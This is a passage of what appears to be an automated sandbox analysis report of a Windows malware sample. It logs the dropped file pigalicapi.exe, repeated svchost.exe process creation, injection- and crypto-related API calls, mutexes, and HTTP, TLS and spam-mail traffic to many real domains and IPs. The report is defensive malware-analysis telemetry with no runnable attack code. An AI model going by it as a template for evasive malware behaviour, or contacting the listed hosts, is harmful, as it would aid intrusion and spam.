Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
Source: global traffic	HTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: pleszew.policja.gov.pl
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: flamingorecordings.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.muhr-soehne.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: ldh.la.gov
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: orlyhotel.comCookie: django_language=en
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: clinicasanluis.com.co
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: diamir.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: www.diamir.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: nts-web.net
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.se
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: sigtoa.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: hyab.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: techtrans.de
Source: global traffic	HTTP traffic detected: GET /wp-signup.php?new=magicomm.co.uk HTTP/1.1Accept: *Accept-Language: en-usConnection: keep-aliveUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Cache-Control: no-cacheHost: dataform.co.uk

Source: unknown	HTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:50143 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.5:50153 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:50171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50205 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.5:50206 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.5:50232 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:50293 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:50315 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:50314 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.5:50274 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.5:50316 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.5:50319 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.5:50328 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.224:443 -> 192.168.2.5:51189 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.5:52021 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:53629 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.5:53662 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:53343 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:53754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.5:53761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.5:53822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.5:53819 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.5:53915 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:53931 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:55181 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.5:55278 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.5:56144 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.5:56207 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:59805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:60568 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.5:60665 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:60953 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:61710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.156.49:443 -> 192.168.2.5:61785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:62444 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.5:62294 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:62475 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.164.178:443 -> 192.168.2.5:62498 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.5:62500 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.224:443 -> 192.168.2.5:62536 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:62529 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.224:443 -> 192.168.2.5:62544 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.5:62578 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.5:62542 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.5:62560 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.237.66.112:443 -> 192.168.2.5:22763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:22849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.5:23522 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.220:443 -> 192.168.2.5:24097 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 75.2.95.235:443 -> 192.168.2.5:24451 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 49.212.235.175:443 -> 192.168.2.5:24424 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:24947 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 138.201.65.187:443 -> 192.168.2.5:25237 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 5.189.171.125:443 -> 192.168.2.5:25239 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 83.223.113.46:443 -> 192.168.2.5:25909 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:24562 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.65.224:443 -> 192.168.2.5:26500 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.5:26920 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.229.22.126:443 -> 192.168.2.5:27376 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.214.171.193:443 -> 192.168.2.5:27407 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Send many emails (e-Mail Spam)

Source: SMTP

Network traffic detected: Mail traffic on many different IPs 65

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_04008800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	0_2_04008800
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_04008970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,	0_2_04008970
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_04008A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	0_2_04008A70
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_024E8A70 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	1_2_024E8A70
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_024E8800 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptImportKey,CryptExportKey,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,	1_2_024E8800
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_024E8970 CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptDestroyKey,CryptReleaseContext,	1_2_024E8970

Source: 6gjnnBAbpc.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_00E60000		0_2_00E60000
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_00A20000		1_2_00A20000

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_00402075 LoadIconA,LoadCursorA,LoadIconA,LoadIconA,RegisterClassExA,MessageBoxA,CreateWindowExA,CreateWindowExA,MessageBoxA,ShowWindow,ExitProcess,memset,NtQueueApcThread,RtlQueueApcWow64Thread,NtTestAlert,UpdateWindow,TranslateMessage,DispatchMessageA,GetMessageA,	0_2_00402075
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_00401EBB LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,	0_2_00401EBB
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_00404A1C zWTIymdDMskIqeLktgG,	0_2_00404A1C
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_00404CA6 ZWBgoqgZPM,	0_2_00404CA6
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Code function: 0_2_00401E50 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject,	0_2_00401E50
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_00402075 LoadIconA,LoadCursorA,LoadIconA,LoadIconA,RegisterClassExA,MessageBoxA,CreateWindowExA,CreateWindowExA,MessageBoxA,ShowWindow,ExitProcess,memset,NtQueueApcThread,RtlQueueApcWow64Thread,NtTestAlert,UpdateWindow,TranslateMessage,DispatchMessageA,GetMessageA,	1_2_00402075
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_00401EBB LdrFindResource_U,LdrAccessResource,NtAllocateVirtualMemory,	1_2_00401EBB
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_00404A1C zWTIymdDMskIqeLktgG,	1_2_00404A1C
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_00404CA6 ZWBgoqgZPM,	1_2_00404CA6
Source: C:\Users\user\pigalicapi.exe	Code function: 1_2_00401E50 ZwOpenSymbolicLinkObject,ZwOpenSymbolicLinkObject,	1_2_00401E50

Source: Joe Sandbox View

Dropped File: C:\Users\user\pigalicapi.exe 987204CA82337F0A3F28097A5D66D5F3ECB11D43D82F67CD753D0BF2CE40B7A7

Source: 6gjnnBAbpc.exe	Virustotal: Detection: 17%
Source: 6gjnnBAbpc.exe	ReversingLabs: Detection: 29%

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

File read: C:\Users\user\Desktop\6gjnnBAbpc.exe

Jump to behavior

Source: 6gjnnBAbpc.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\6gjnnBAbpc.exe C:\Users\user\Desktop\6gjnnBAbpc.exe
Source: unknown	Process created: C:\Users\user\pigalicapi.exe "C:\Users\user\pigalicapi.exe"
Source: unknown	Process created: C:\Users\user\pigalicapi.exe "C:\Users\user\pigalicapi.exe"
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Users\user\pigalicapi.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Users\user\pigalicapi.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Users\user\pigalicapi.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\system32\svchost.exe	Jump to behavior

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@37/4@2693/100

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe

Code function: 0_2_04001CA0 CreateToolhelp32Snapshot,Process32First,GetCurrentProcessId,Process32Next,Process32First,lstrlenA,lstrcpyA,OpenProcess,EnumProcessModules,K32EnumProcessModules,GetModuleFileNameExA,GetProcessImageFileNameA,K32GetProcessImageFileNameA,FindCloseChangeNotification,Process32Next,CloseHandle,

0_2_04001CA0

Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mtx_pthr_locked_shmem
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mutex_global_shmem
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListMax_shmem
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-rwl_global_shmem
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mutex_global_static_shmem
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_sch_shmem
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-sjlj_once
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_tls_shmem
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idList_shmem
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-use_fc_key
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_cancelling_shmem
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-once_global_shmem
Source: C:\Windows\SysWOW64\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\zczoiir65502
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListCnt_shmem
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_tls_once_shmem
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-fc_key
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	Mutant created: \Sessions\1\BaseNamedObjects\pigalicapi
Source: C:\Windows\SysWOW64\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\rjsfitz60229
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-once_obj_shmem
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_dest_shmem
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-idListNextId_shmem
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-mxattr_recursive_shmem
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_max_shmem
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-cond_locked_shmem_rwlock
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-_pthread_key_lock_shmem
Source: C:\Windows\SysWOW64\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\pvoaiwz6588
Source: C:\Users\user\pigalicapi.exe	Mutant created: \Sessions\1\BaseNamedObjects\gcc-shmem-tdm2-pthr_root_shmem

Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\6gjnnBAbpc.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\pigalicapi.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
